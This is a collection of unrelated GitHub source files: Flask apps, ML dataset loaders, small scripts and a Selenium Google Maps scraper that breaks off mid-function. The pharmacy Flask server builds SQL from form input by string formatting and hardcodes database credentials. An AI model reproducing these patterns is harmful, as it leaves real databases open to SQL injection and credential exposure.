from flask_login import login_user, current_user, logout_user, login_required
from app import db, bcrypt
from app.forms import LoginForm, RegistrationForm, AddBookForm, UpdateBookForm
from app.models import User, Book, BookListBook, BookSerie, BorrowedBook
routes = Blueprint('routes', __name__)
# User-related routes
@routes.route('/login', methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('routes.index'))
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
print("User found:", user) # Debugging statement
if user and bcrypt.check_password_hash(user.password, form.password.data):
print("Password matches") # Debugging statement
login_user(user, remember=form.remember_me.data)
next_page = request.args.get('next')
return redirect(next_page) if next_page else redirect(url_for('routes.book_list'))
else:
flash('Login Unsuccessful. Please check email and password', 'danger')
else:
print("Form not validated:", form.errors) # Debugging statement
return render_template('login.html', title='Login', form=form)
@routes.route('/register', methods=['GET', 'POST'])
def register():
if current_user.is_authenticated:
return redirect(url_for('routes.index'))
form = RegistrationForm()
if form.validate_on_submit():
hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')
user = User(username=form.username.data, email=form.email.data, password=hashed_password)
db.session.add(user)
db.session.commit()
flash('Your account has been created! You can now log in', 'success')
return redirect(url_for('routes.login'))
return render_template('register.html', title='Register', form=form)
@routes.route('/logout')
def logout():
logout_user()
return redirect(url_for('routes.index'))
# Book-related routes
@routes.route('/')
@routes.route('/index')
@login_required
def index():
print("Authenticated:", current_user.is_authenticated)
books = Book.query.all()
return render_template('index.html', books=books)
@routes.route('/book_list')
@login_required
def book_list():
books = Book.query.all()
return render_template('book_list.html', books=books)
@routes.route('/book_detail/<int:book_id>')
@login_required
def book_detail(book_id):
book = Book.query.get_or_404(book_id)
return render_template('book_detail.html', book=book)
# Add, update, and delete book routes from previous response
@routes.route('/book_add', methods=['GET', 'POST'])
@login_required
def book_add():
form = AddBookForm()
if form.validate_on_submit():
book = Book(title=form.title.data, author=form.author.data)
db.session.add(book)
db.session.commit()
flash('Votre livre a été ajouté avec succès!', 'success')
return redirect(url_for('routes.index'))
return render_template('book_add.html', title='Ajouter un livre', form=form)
@routes.route('/book_update/<int:book_id>', methods=['GET', 'POST'])
@login_required
def book_update(book_id):
book = Book.query.get_or_404(book_id)
if not current_user.is_admin:
abort(403)
form = UpdateBookForm()
if form.validate_on_submit():
book.title = form.title.data
book.author = form.author.data
db.session.commit()
flash('Votre livre a été mis à jour avec succès!', 'success')
return redirect(url_for('routes.book_detail', book_id=book.id_book))
elif request.method == 'GET':
form.title.data = book.title
form.author.data = book.author
return render_template('book_update.html', title='Modifier un livre', form=form, book=book)
@routes.route('/book_delete/<int:book_id>', methods=['POST'])
@login_required
def book_delete(book_id):
book = Book.query.get_or_404(book_id)
if not current_user.is_admin:
abort(403)
# Supprimer les entrées associées dans la table BookListBook
book_list_books = BookListBook.query.filter_by(book_id=book.id_book).all()
for book_list_book in book_list_books:
db.session.delete(book_list_book)
# Supprimer les entrées associées dans la table BookSerie
book_series = BookSerie.query.filter_by(book_id=book.id_book).all()
for book_serie in book_series:
db.session.delete(book_serie)
# Supprimer les entrées associées dans la table BorrowedBook
borrowed_books = BorrowedBook.query.filter_by(book_id=book.id_book).all()
for borrowed_book in borrowed_books:
db.session.delete(borrowed_book)
# Supprimer le livre
db.session.delete(book)
db.session.commit()
flash('Votre livre a été supprimé avec succès!', 'success')
return redirect(url_for('routes.index'))
# Error handlers
@routes.errorhandler(404)
def not_found_error(error):
return render_template('404.html'), 404
@routes.errorhandler(403)
def forbidden_error(error):
return render_template('403.html'), 403
@routes.errorhandler(500)
def internal_error(error):
db.session.rollback()
return render_template('500.html'), 500
|
AdrienDEBREUILLY/Library_perso_and_family
|
app/routes.py
|
routes.py
|
py
| 5,345 |
python
|
en
|
code
| 0 |
github-code
|
6
|
30914361148
|
import streamlit as st
import openai
openai.api_key = st.secrets["OPENAI_API_KEY"]
def write_page_config():
st.set_page_config(
page_title="AI 서비스 개발하기",
page_icon="🧠"
)
def request_chat_completion(prompt, stream=False, system_role=None):
messages = [{"role": "user", "content": prompt}]
if system_role:
messages = [{"role": "system", "content": system_role}] + messages
response = openai.ChatCompletion.create(
model="gpt-3.5-turbo",
messages=messages,
stream=stream
)
return response
def write_streaming_response(response):
message = ""
placeholder = st.empty()
for chunk in response:
delta = chunk.choices[0]["delta"]
if "content" in delta:
message += delta["content"]
placeholder.markdown(message + "▌")
else:
break
placeholder.markdown(message)
return message
|
yeomko22/useful_chatgpt
|
common.py
|
common.py
|
py
| 948 |
python
|
en
|
code
| 0 |
github-code
|
6
|
32275396284
|
import torch
from torch.utils.data import Dataset
from torchvision.datasets import ImageFolder
import torchvision.transforms as transforms
import os
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
class TabularDataset(Dataset):
def __init__(
self,
dataset: str or pd.DataFrame,
atts: list,
root: str = "data/clean",
target: str = "TARGET",
set: str = "train",
pred: bool = False,
split: bool = False,
test_perc: float = 0.1,
device: str = "cuda:0",
):
"""
:param dataset: str or Pandas.DataFrame
:param atts: list
The names of features.
:param root:
The path to data. Ignored if dataset is a Pandas.DataFrame.
:param target:
The name of target variable. The default is 'TARGET'.
:param set:
The set to which we are referring. Ignored if dataset is a Pandas DataFrame.
:param pred: bool
It determines whether the target variable is seen or not. The default is False.
:param device:
"""
super(TabularDataset, self).__init__()
if type(dataset) == str:
self.path = os.path.join(root, dataset, dataset + "_" + set + ".csv")
self.df = pd.read_csv(self.path)
elif type(dataset) == pd.DataFrame:
self.df = dataset
self.cat_atts = list(
self.df[atts].select_dtypes(include=["object", "category"]).columns
)
self.cont_atts = list(
self.df[atts].select_dtypes(exclude=["object", "category"]).columns
)
for col in self.cat_atts:
self.df[col] = self.df[col].astype("category").cat.codes
for col in self.cont_atts:
self.df[col] = self.df[col].astype(float)
self.pred = pred
if torch.cuda.is_available():
self.device = device
else:
self.device = "cpu"
print("Cuda is not available. The device is set to cpu.")
self.x_num = (
torch.from_numpy(self.df[self.cont_atts].values).float().to(self.device)
)
self.x_cat = (
torch.from_numpy(self.df[self.cat_atts].values).to(self.device).long()
)
self.data = torch.cat([self.x_num, self.x_cat], dim=1)
if self.pred is False:
self.y = torch.from_numpy(self.df[target].values).to(self.device)
self.targets = self.df[target].values
self.classes = np.unique(self.df[target])
def __getitem__(self, index):
if self.pred:
return self.x_num[index], self.x_cat[index]
else:
return self.x_num[index], self.x_cat[index], self.y[index], index
def __len__(self):
return self.data.shape[0]
class ImgFolder(ImageFolder):
def __getitem__(self, index):
x, y = super().__getitem__(index)
return x, y, index
|
cmougan/SelectiveRegression
|
tools/datasets.py
|
datasets.py
|
py
| 3,006 |
python
|
en
|
code
| 2 |
github-code
|
6
|
33526625463
|
#Faça um programa que jogue par ou ímpar com o computador. O jogo só será interrompido quando o jogador perder, mostrando o total de vitórias consecutivas que ele conquistou no final do jogo.
from random import randint
vitórias=0
while True:
escolha=input("Você quer par ou ímpar?(DIGITE PAR OU ÍMPAR)").upper()
jogador=int(input("Escolha um número entre 0 e 10:"))
computador=randint(0,10)
soma=computador+jogador
if escolha=="ÍMPAR":
if soma%2==0:
print("Você perdeu. TENTE NOVAMENTE.")
print(f"Deu par!!! Você escolheu {jogador} e o computador escolheu {computador}, resultando em {soma}.")
break
elif soma%2==1:
vitórias+=1
print("PARABÉNS!!! Você ganhou.")
print(f"Deu ímpar!!! Você escolheu {jogador} e o computador escolheu {computador}, resultando em {soma}.")
continue
elif escolha=="PAR":
if soma%2==0:
vitórias+=1
print("PARABÉNS!!! Você ganhou.")
print(f"Deu par!!! Você escolheu {jogador} e o computador escolheu {computador}, resultando em {soma}.")
continue
elif soma%2==1:
print("Você perdeu. TENTE NOVAMENTE.")
print(f"Deu ímpar!!! Você escolheu {jogador} e o computador escolheu {computador}, resultando em {soma}.")
break
print(f"Você conseguiu {vitórias} vitória(s) consecutiva(s).")
|
cauavsb/python
|
mundo-2-py/ex33.py
|
ex33.py
|
py
| 1,455 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
24582961875
|
import os
# accessible as a variable in index.html:
from sqlalchemy import *
from sqlalchemy.pool import NullPool
from flask import Flask, request, render_template, g, redirect, Response
from flask import redirect, url_for
tmpl_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'templates')
app = Flask(__name__, template_folder=tmpl_dir)
DATABASE_USERNAME = "yw3930"
DATABASE_PASSWRD = "3089"
DATABASE_HOST = "34.148.107.47" # change to 34.28.53.86 if you used database 2 for part 2
DATABASEURI = f"postgresql://{DATABASE_USERNAME}:{DATABASE_PASSWRD}@{DATABASE_HOST}/project1"
engine = create_engine(DATABASEURI)
#
# try:
# connection = engine.connect()
# # get column names and data for drug table
# select_query = "SELECT * FROM drug;"
# result = connection.execute(text(select_query))
# columns = result.keys()
# data = result.fetchall()
# print("Columns in drug table:")
# print(columns)
# print("Data in drug table:")
# for row in data:
# print(row)
#
# print('---------------------------------------')
#
# # get column names and data for pharmacy_storage table
# select_query = "SELECT * FROM pharmacy_storage;"
# result = connection.execute(text(select_query))
# columns = result.keys()
# data = result.fetchall()
# print("Columns in pharmacy_storage table:")
# print(columns)
# print("Data in pharmacy_storage table:")
# for row in data:
# print(row)
# connection.close()
#
# except Exception as e:
# print(f"Error connecting to database: {e}")
@app.before_request
def before_request():
"""
This function is run at the beginning of every web request
(every time you enter an address in the web browser).
We use it to setup a database connection that can be used throughout the request.
The variable g is globally accessible.
"""
try:
g.conn = engine.connect()
except:
print("uh oh, problem connecting to database")
import traceback; traceback.print_exc()
g.conn = None
@app.teardown_request
def teardown_request(exception):
"""
At the end of the web request, this makes sure to close the database connection.
If you don't, the database could run out of memory!
"""
try:
g.conn.close()
except Exception as e:
pass
@app.route('/')
def home():
return render_template('home.html')
@app.route('/search', methods=['POST'])
def search():
drug_id = request.form['drug_id']
select_query = "SELECT * FROM pharmacy_storage WHERE drug_id = " + str(drug_id)
cursor = g.conn.execute(text(select_query))
if not cursor.rowcount:
return render_template("error.html", drug_id=drug_id)
else:
results = [result for result in cursor]
cursor.close()
# print(results)
return render_template("drug_information.html", drug_id=drug_id, drug_name=results[0][0], category=results[0][1], safety_stock=results[0][2], dosage=results[0][3])
@app.route('/add_drug', methods=['GET', 'POST'])
def add_drug():
if request.method == 'POST':
# get form data
drug_id = request.form['drug_id']
drug_name = request.form['drug_name']
quantity = int(request.form['quantity'])
expire_date = request.form['expire_date']
# check if drug exists in drug table
select_query = f"SELECT * FROM drug WHERE drug_id = '{drug_id}' and drug_name = '{drug_name}'"
cursor = g.conn.execute(text(select_query))
if not cursor.rowcount:
cursor.close()
error_message = f"Drug with ID '{drug_id}' or name '{drug_name}' does not exist in the database."
return render_template("error.html", error_message=error_message)
# check if drug exists in pharmacy storage
select_query = f"SELECT * FROM pharmacy_storage WHERE drug_id = '{drug_id}' and drug_name = '{drug_name}' and expire_date = '{expire_date}'"
cursor = g.conn.execute(text(select_query))
if cursor.rowcount:
# if drug exists in storage with same expiration date, add quantity
results = [result for result in cursor]
print(results)
new_quantity = int(results[0][5]) + int(quantity)
update_query = f"UPDATE pharmacy_storage SET quantity = {new_quantity} WHERE drug_id = '{drug_id}' and drug_name = '{drug_name}' and expire_date = '{expire_date}'"
g.conn.execute(text(update_query))
else:
# if drug doesn't exist in storage, add new record
insert_query = f"INSERT INTO pharmacy_storage (drug_id, drug_name, expire_date, quantity) VALUES ('{drug_id}', '{drug_name}', '{expire_date}', {quantity})"
g.conn.execute(text(insert_query))
cursor.close()
# render updated pharmacy storage page
select_query = "SELECT * FROM pharmacy_storage ORDER BY drug_id, drug_name, expire_date"
cursor = g.conn.execute(text(select_query))
storage_results = [result for result in cursor]
cursor.close()
g.conn.commit()
return render_template("pharmacy_storage.html", storage_results=storage_results)
else:
return render_template("add_drug.html")
@app.route('/take_drug', methods=['GET', 'POST'])
def take_drug():
if request.method == 'POST':
# get form data
drug_id = request.form['drug_id']
drug_name = request.form['drug_name']
quantity = int(request.form['quantity'])
expire_date = request.form['expire_date']
# check if drug exists in drug table
select_query = f"SELECT * FROM drug WHERE drug_id = '{drug_id}' and drug_name = '{drug_name}'"
cursor = g.conn.execute(text(select_query))
if not cursor.rowcount:
cursor.close()
error_message = f"Drug with ID '{drug_id}' or name '{drug_name}' does not exist in the database."
return render_template("error.html", error_message=error_message)
# check if drug exists in pharmacy storage
select_query = f"SELECT * FROM pharmacy_storage WHERE drug_id = '{drug_id}' and drug_name = '{drug_name}' and expire_date = '{expire_date}'"
cursor = g.conn.execute(text(select_query))
if not cursor.rowcount:
cursor.close()
error_message = f"Drug with ID '{drug_id}', name '{drug_name}', and expiration date '{expire_date}' does not exist in the pharmacy storage."
return render_template("error.html", error_message=error_message)
results = [result for result in cursor]
cursor.close()
# check if quantity is sufficient
if int(results[0][5]) < quantity:
error_message = f"Insufficient quantity of drug with ID '{drug_id}', name '{drug_name}', and expiration date '{expire_date}' in the pharmacy storage."
return render_template("error.html", error_message=error_message)
# calculate new quantity and update database
new_quantity = int(results[0][5]) - quantity
if new_quantity < 0:
error_message = f"Invalid quantity of drug with ID '{drug_id}', name '{drug_name}', and expiration date '{expire_date}'. Quantity after taking cannot be less than 0."
return render_template("error.html", error_message=error_message)
elif new_quantity == 0:
delete_query = f"DELETE FROM pharmacy_storage WHERE drug_id = '{drug_id}' and drug_name = '{drug_name}' and expire_date = '{expire_date}'"
g.conn.execute(text(delete_query))
else:
update_query = f"UPDATE pharmacy_storage SET quantity = {new_quantity} WHERE drug_id = '{drug_id}' and drug_name = '{drug_name}' and expire_date = '{expire_date}'"
g.conn.execute(text(update_query))
# render updated pharmacy storage page
select_query = "SELECT * FROM pharmacy_storage ORDER BY drug_id, drug_name, expire_date"
cursor = g.conn.execute(text(select_query))
storage_results = [result for result in cursor]
cursor.close()
g.conn.commit()
return render_template("pharmacy_storage.html", storage_results=storage_results)
else:
return render_template("take_drug.html")
@app.route('/pharmacy_storage')
def pharmacy_storage():
select_query = "SELECT * FROM pharmacy_storage;"
cursor = g.conn.execute(text(select_query))
storage_results = [result for result in cursor]
cursor.close()
return render_template('pharmacy_storage.html', storage_results=storage_results)
if __name__ == "__main__":
import click
@click.command()
@click.option('--debug', is_flag=True)
@click.option('--threaded', is_flag=True)
@click.argument('HOST', default='0.0.0.0')
@click.argument('PORT', default=8111, type=int)
def run(debug, threaded, host, port):
HOST, PORT = host, port
print("running on %s:%d" % (HOST, PORT))
app.run(host=HOST, port=PORT, debug=debug, threaded=threaded)
run()
|
YueWang417/w4111-proj1-group69
|
webserver/server.py
|
server.py
|
py
| 9,229 |
python
|
en
|
code
| 0 |
github-code
|
6
|
33645813981
|
# -*- coding: utf-8 -*-
import os
import importlib
import yaml
#Imports das bibliotecas: Comunicação com Webservers
import json
import requests
from requests.exceptions import ConnectionError
from WebService import *
import re as regex
from PyQt5 import QtWidgets
from PyQt5.QtCore import *
import time
from OS_define import OS_define
from datetime import datetime
from pathlib import Path
import sys
import platform
import logging
global logger
logger=logging.getLogger()
logger.setLevel(logging.DEBUG)
class ApiManager:
script_location = Path(__file__).absolute().parent
def __init__(self, FilePath = script_location / 'Apis.yml'):
with open(FilePath, 'r') as ymlfile:
cfg = yaml.load(ymlfile)
self.OJT = WebService(cfg['OJT'])
self.AIO = WebService(cfg['AIO'])
self.AIO_Dashboard = WebService(cfg['AIO_Dashboard'])
#self.JMD = WebService(cfg['JMD'])
def Request(self, webServiceObject, functionName, parameterObject):
if isinstance(webServiceObject, WebService):
for prop in webServiceObject._WebService__yamlContents:
for key in webServiceObject._WebService__yamlContents[prop]:
if (prop=='baseUrl'):
continue
if (regex.match(functionName, key, regex.I|regex.M)):
endPoint = webServiceObject._WebService__baseUrl+prop+"/"+key+"/";
RequestType = webServiceObject._WebService__yamlContents[prop][key]['Type'];
ArgumentsCount = webServiceObject._WebService__yamlContents[prop][key]['ArgumentsCount'];
print("##########")
print ("link: " + endPoint+str(parameterObject))
try:
if (regex.match(RequestType, 'Post', regex.I|regex.M)):
response = requests.post(endPoint, parameterObject)
print(response.elapsed.total_seconds())
print("##########")
return response.json();
elif (regex.match(RequestType, 'Get', regex.I|regex.M)):
response = requests.get(endPoint+parameterObject)
if (response.status_code==200):
print(response.elapsed.total_seconds())
print("##########")
return response.json()
elif (returnData.status_code==404):
print("API Call " + endPoint+parameterObject + " returned a status code " + returnData.status_code)
else:
print("API Call " + endPoint+parameterObject + " returned a status code " + returnData.status_code)
return returnData;
pass
else:
raise Exception("API Type parameter undefined.")
except ConnectionError as e:
print("No internet connection to perform Api Call " + endPoint + parameterObject + " Error:" + type(e).__name__)
importlib.reload(requests)
return type(e).__name__
except Exception as e:
#except:
print("Exception while calling API " + endPoint + " Type: " + type(e).__name__)
# returnData = requests.post(endPoint, "")
# return returnData;
return
raise Exception("Undefined API Function: " + functionName)
else:
raise Exception("Given object is not a WebService object");
return "Problem"
def GetSingleValueFromJsonObject(self, jsonObject, key, raiseException):
result = jsonObject.get(key, "Not found");
if (raiseException):
raise Exception ("A chave: " +key +" não existe dentro do objeto")
return result;
def load_LPA(self,BadgeID,Workstep,RouteID):
baseUrl = 'http://**************01/LPAEletronico/Lpa/Login?registration='
if (str(RouteID)=="187" or str(RouteID)=="168" or str(RouteID)=="23" or str(RouteID)=="13" or str(RouteID)=="20" or str(RouteID)=="26" or str(RouteID)=="197"):
baseUrl = baseUrl + str(BadgeID) + '&idworkline=' + str(RouteID)
elif(str(RouteID)=="152" or str(RouteID)=="153" or str(RouteID)=="200" or str(RouteID)=="208" or str(RouteID)=="205"):
baseUrl = 'http://**************01/LPAVLS/Lpa/Login?registration='
baseUrl = baseUrl + str(BadgeID) + '&idworkstep=' + str(Workstep)
else:
baseUrl = baseUrl + str(BadgeID) + '&idworkstep=' + str(Workstep)
print("LPA URL addres: " + baseUrl)
return baseUrl
def load_Jiga(self,lineId):
baseUrl = 'http://**************01/SCTC/Dashboard/ToolingDashboard.aspx?areaId=3&lineId='
baseUrl = baseUrl + str(lineId)
return baseUrl
def load_BI(self,BadgeID,StationID):
print("workstation id:" + str(StationID))
userIdurl = "http://**************02/AIOService/Jmd/GetUserDetailsByRegistration/" + BadgeID
r = requests.get(userIdurl)
response = r.json()
userId = response['idUser']
baseUrl = 'http://**************01/GoodIdeas/GoodIdea/NewIdea?registration=' + str(BadgeID) + '&menuCollapse=true'
print("BI URL addres: " + baseUrl)
return baseUrl
def load_lineName(self,stationId):
baseUrl = 'http://**************02/JMDDataServices/workstation/'
baseUrl = baseUrl + str(stationId) + '/productionlines'
response = requests.get(baseUrl)
return response.json()
def load_FI(self,Workstation):
from PyQt5.QtWebEngineCore import QWebEngineHttpRequest
self.url = QUrl()
self.req = QWebEngineHttpRequest()
self.url.setScheme("http")
self.url.setHost("**************01")
self.url.setPath("/FICreator/FIViewer/SlideShow")
self.req.setUrl(self.url)
self.req.setMethod(QWebEngineHttpRequest.Post)
self.req.setHeader(QByteArray(b'Content-Type'),QByteArray(b'application/json'))
parametros = {"workstation": Workstation, "prodashSync": True, "time": 5}
self.req.setPostData(bytes(json.dumps(parametros), 'utf-8'))
return self.req
def load_5s(self,Workstation):
baseUrl = 'http://**************99/AIOServiceSTG/Images5S/GetAll?query='
baseUrl = baseUrl + str(Workstation)
print("###########")
logger.error(baseUrl)
try:
response = requests.get(baseUrl)
logger.error(response.json())
return response.json();
except Exception as e:
print("Erro API 5s:: " + type(e).__name__)
logger.error("Erro API 5s:: " + type(e).__name__)
return
def custom_button(self,Area,AreaTrim,Route,Index):
if(Area=="INGCUS" and Index==1):
baseUrl="http://*******/CNCSWebApiPersona/OrMonitor?hostName="
baseUrl = baseUrl + str(Route)
print("OR MONITOR URL: " + baseUrl)
logger.error("OR MONITOR URL: " + baseUrl)
elif(AreaTrim=="REP"):
baseUrl="http://*******m0itqa01/TestPortal/pages/MesWipReport.aspx"
logger.error("LINK TEST WIP REPARO: " + baseUrl)
else:
baseUrl = 'about:blank'
return baseUrl
|
Jhonatan-Avelar/aioJhonatan
|
jhonatanaio/script/ApiManager.py
|
ApiManager.py
|
py
| 8,318 |
python
|
en
|
code
| 0 |
github-code
|
6
|
33645832811
|
# -*- coding: utf-8 -*-
import yaml
import os
from pathlib import Path
class GlobalParameters:
script_location = Path(__file__).absolute().parent
def __init__(self, FilePath = script_location / 'GlobalParameters.yml'):
# Load the yml config file
with open(FilePath, 'r') as ymlfile:
cfg = yaml.load(ymlfile);
# Set the display parameters
self.Screen_Width = cfg['Screen']['Width'];
self.Screen_Height = cfg['Screen']['Height'];
self.Screen_FullSreen = cfg['Screen']['FullSreen'];
# Set the thread parameters
self.BadgeReader_MininumGoodReads = cfg['BadgeReader']['MinimumGoodsReads'];
self.BadgeReader_ThreadTime = cfg['BadgeReader']['BadgeReadFrequency'];
# Set the All in One Current Version
self.AIO_Version = cfg['Version']['Actual'];
|
Jhonatan-Avelar/aioJhonatan
|
jhonatanaio/script/GlobalParameters.py
|
GlobalParameters.py
|
py
| 862 |
python
|
en
|
code
| 0 |
github-code
|
6
|
23854746715
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.home, name='home'),
path('setup', views.setup, name='setup'),
path('about', views.about, name='about'),
path('real_record', views.real_record, name='real_record'),
path('result', views.result, name='result'),
]
|
CHELSEYliuqy/Robo-Website
|
Robo/Optimizer/urls.py
|
urls.py
|
py
| 313 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21965282646
|
import argparse
import glob
from pathlib import Path
import numpy as np
import torch
from pcdet.config import cfg, cfg_from_yaml_file
from pcdet.datasets import DatasetTemplate
from pcdet.models import build_network, load_data_to_gpu
from pcdet.utils import common_utils
class DemoDataset(DatasetTemplate):
def __init__(self, dataset_cfg, class_names, training=True, root_path=None, logger=None, ext='.bin'):
"""
Args:
root_path:
dataset_cfg:
class_names:
training:
logger:
"""
super().__init__(
dataset_cfg=dataset_cfg, class_names=class_names, training=training, root_path=root_path, logger=logger
)
#print(dataset_cfg.DATA_AUGMENTOR)
self.use_data_type = dataset_cfg.DATA_AUGMENTOR.get('USE_DATA_TYPE', None)
self.root_path = root_path
self.ext = ext
data_file_list = glob.glob(str(root_path / f'*{self.ext}')) if self.root_path.is_dir() else [self.root_path]
data_file_list.sort()
self.sample_file_list = data_file_list
def __len__(self):
return len(self.sample_file_list)
def __getitem__(self, index):
if self.ext == '.bin':
print(self.use_data_type)
if self.use_data_type == 'lidar':
points = np.fromfile(self.sample_file_list[index], dtype=np.float32).reshape(-1, 6)
#points = points[:,:4]
else:
points = np.fromfile(self.sample_file_list[index], dtype=np.float32).reshape(-1, 5)
#points = points[:,:4]
elif self.ext == '.npy':
points = np.load(self.sample_file_list[index])
else:
raise NotImplementedError
input_dict = {
'points': points,
'frame_id': index,
}
data_dict = self.prepare_data(data_dict=input_dict)
return data_dict
def parse_config():
parser = argparse.ArgumentParser(description='arg parser')
parser.add_argument('--cfg_file', type=str, default='/ai/volume/Dual-Radar-master/tools/cfgs/dual_radar_models/pointpillar_lidar.yaml',
help='specify the config for demo')
parser.add_argument('--data_path', type=str, default='/ai/volume/Dual-Radar-master/data/dual_radar/lidar/training/velodyne/000000.bin',
help='specify the point cloud data file or directory')
parser.add_argument('--ckpt', type=str, default='/ai/volume/Dual-Radar-master/models/pointpillars_liadr_80.pth', help='specify the pretrained model')
parser.add_argument('--ext', type=str, default='.bin', help='specify the extension of your point cloud data file')
args = parser.parse_args()
cfg_from_yaml_file(args.cfg_file, cfg)
return args, cfg
def main():
args, cfg = parse_config()
logger = common_utils.create_logger()
logger.info('-----------------Quick Demo of OpenPCDet-------------------------')
demo_dataset = DemoDataset(
dataset_cfg=cfg.DATA_CONFIG, class_names=cfg.CLASS_NAMES, training=False,
root_path=Path(args.data_path), ext=args.ext, logger=logger
)
with torch.no_grad():
for idx, data_dict in enumerate(demo_dataset):
logger.info(f'Visualized sample index: \t{idx + 1}')
data_dict = demo_dataset.collate_batch([data_dict])
load_data_to_gpu(data_dict)
logger.info('Demo done.')
if __name__ == '__main__':
main()
|
adept-thu/Dual-Radar
|
tools/demo_text.py
|
demo_text.py
|
py
| 3,490 |
python
|
en
|
code
| 62 |
github-code
|
6
|
10418893375
|
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import NoSuchElementException
from webdriver_manager.chrome import ChromeDriverManager
from selenium.common.exceptions import ElementNotInteractableException
from dash import html
from parsel import Selector
from selenium.webdriver.common.action_chains import ActionChains
from selenium.common.exceptions import TimeoutException
import re
import time
import json
import sys
from selenium.common.exceptions import StaleElementReferenceException
import traceback
from multiprocessing import Pool
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.chrome.options import Options
from concurrent.futures.thread import ThreadPoolExecutor
import selenium_async
import asyncio
import atexit
executor = ThreadPoolExecutor(10)
def initialize_driver():
chrome_options = Options()
# Run in headless mode. Comment this line if you want to see the browser actions
chrome_options.add_argument("--headless")
chrome_options.add_argument("--no-sandbox")
chrome_options.add_argument("--disable-dev-shm-usage")
# Initialize the Chrome driver
driver = webdriver.Chrome(service=Service(ChromeDriverManager().install()), options=chrome_options)
return driver
driver = initialize_driver()
def scrollDownLeftMenuOnGoogleMaps(waitingTime):
try:
menu_xpath = '/html/body/div[3]/div[9]/div[9]/div/div/div[1]/div[2]/div[1]/div[1]/div[1]'
WebDriverWait(driver, waitingTime).until(
EC.visibility_of_element_located((By.XPATH, menu_xpath)))
element = driver.find_element("xpath", menu_xpath)
driver.execute_script("arguments[0].scrollIntoView();", element)
except TimeoutException:
print("Timeout for scrollDownLeftMenuOnGoogleMaps")
def getPhone(htmlCode):
phone = ""
phoneEl = htmlCode.xpath(
'//button[contains(@data-tooltip, "Copy phone number")]')
if phoneEl and len(phoneEl) > 0:
phoneStr = phoneEl[0].xpath('@data-item-id').extract_first('')
if phoneStr:
numbers = ''.join(c for c in phoneStr if c.isdigit())
if numbers.startswith('0'):
numbers = '+62' + numbers[1:]
phone = numbers
return phone
def getPrice(htmlCode):
price = 0
element = htmlCode.xpath('//button[@aria-haspopup="dialog" and @class="Tc0rEd fT414d plVN2c "]')
if element and len(element) > 0:
aria_label = element[0].attrib.get('aria-label', '')
price_match = re.search(r'IDR\s+([\d,]+)', aria_label)
if price_match:
price_str = price_match.group(1).replace(',', '')
try:
price = int(price_str)
return price
except ValueError:
return 0
return price
def getCheckout(htmlCode):
result = ""
element = htmlCode.xpath(
'//div[contains(@data-item-id, "place-info-links:")]')
if element and len(element) > 0:
str = element[0].xpath('.//div[2]/div[1]/span/text()')
result = str.get()
return result
def getMenu(htmlCode):
result = ""
element = htmlCode.xpath(
'//a[contains(@data-tooltip, "Open menu link")]')
if element and len(element) > 0:
valueStr = element[0].xpath('@href').extract_first('')
result = valueStr
return result
def extract_price(price_str):
non_decimal = ''.join(ch for ch in price_str if ch.isdigit())
try:
return int(non_decimal)
except ValueError:
return 0
def getAboutData():
price = 0
star_rating = ""
all_text = ""
try:
element = WebDriverWait(driver, 5).until(EC.element_to_be_clickable(
(By.XPATH, '//button[.//div[contains(text(), "About")]]')))
if element:
element.click()
price_element = WebDriverWait(driver, 5).until(EC.visibility_of_element_located(
(By.XPATH, '//div[@class="s35xed"]//li[@class="OyY9Kc"]/span')))
if price_element:
price = extract_price(price_element.text)
star_rating_element = WebDriverWait(driver, 5).until(EC.visibility_of_element_located(
(By.XPATH, '//div[@class="s35xed"]//li[@class="OyY9Kc" and contains(., "star hotel")]/span')))
if star_rating_element:
star_rating = star_rating_element.text or ""
text_elements = WebDriverWait(driver, 5).until(EC.presence_of_all_elements_located(
(By.XPATH, '//div[@class="HeZRrf"]//div[@class="P1LL5e"]')))
if text_elements:
all_text = ' '.join([element.text for element in text_elements])
except TimeoutException:
print("Timeout for ABOUT Page")
return (price, star_rating, all_text)
except Exception as e:
print("***********************ERROR*************************")
print("Error about data", e)
return (price, star_rating, all_text)
# traceback.print_exc()
return (price, star_rating, all_text)
def getBookingLink(htmlCode):
result = ""
element = htmlCode.xpath(
'//a[contains(@data-tooltip, "Open booking link")]')
if element and len(element) > 0:
valueStr = element[0].xpath('@href').extract_first('')
result = valueStr
return result
def getAddress(htmlCode):
result = ""
element = htmlCode.xpath(
'//button[contains(@data-tooltip, "Copy address")]')
if element and len(element) > 0:
valueStr = element[0].attrib.get('aria-label', '')
result = valueStr
return result
def getCategory(htmlCode):
result = ""
element = htmlCode.xpath(
'//button[contains(@jsaction, "pane.rating.category")]')
if element and len(element) > 0:
valueStr = element[0].xpath('string()').get()
result = valueStr
return result
def getPhotos():
result = []
try:
element = driver.find_element("xpath",
"//button[contains(@aria-label, 'All')]")
driver.execute_script("arguments[0].scrollIntoView();", element)
driver.execute_script("arguments[0].click();", element)
backButton = WebDriverWait(driver, 5).until(EC.visibility_of_element_located(
(By.XPATH, "//button[contains(@data-tooltip, 'Back')]")))
imgElements = driver.find_elements(
"xpath", "//a[starts-with(@data-photo-index, '')]/div[@role='img']")
numberOfElements = len(imgElements)
for i in range(numberOfElements):
imgEl = driver.find_element("xpath",
"//a[@data-photo-index='" + str(i) + "']/div[@role='img']")
driver.execute_script("arguments[0].scrollIntoView();", imgEl)
WebDriverWait(driver, 5).until(
lambda driver: 'https' in imgEl.get_attribute('style'))
style = imgEl.get_attribute('style')
url = style.split('"')[1]
result.append(url)
driver.execute_script("arguments[0].click();", backButton)
except TimeoutException:
print("Timeout for getPhotos")
except Exception as e:
print("***********************ERROR*************************")
print("Error getPhotos:")
return result
def getReviews():
result = {"this_year": [], "previous_years": []}
num_comments = 20
try:
scrollDownLeftMenuOnGoogleMaps(5)
element = WebDriverWait(driver, 5).until(EC.visibility_of_element_located(
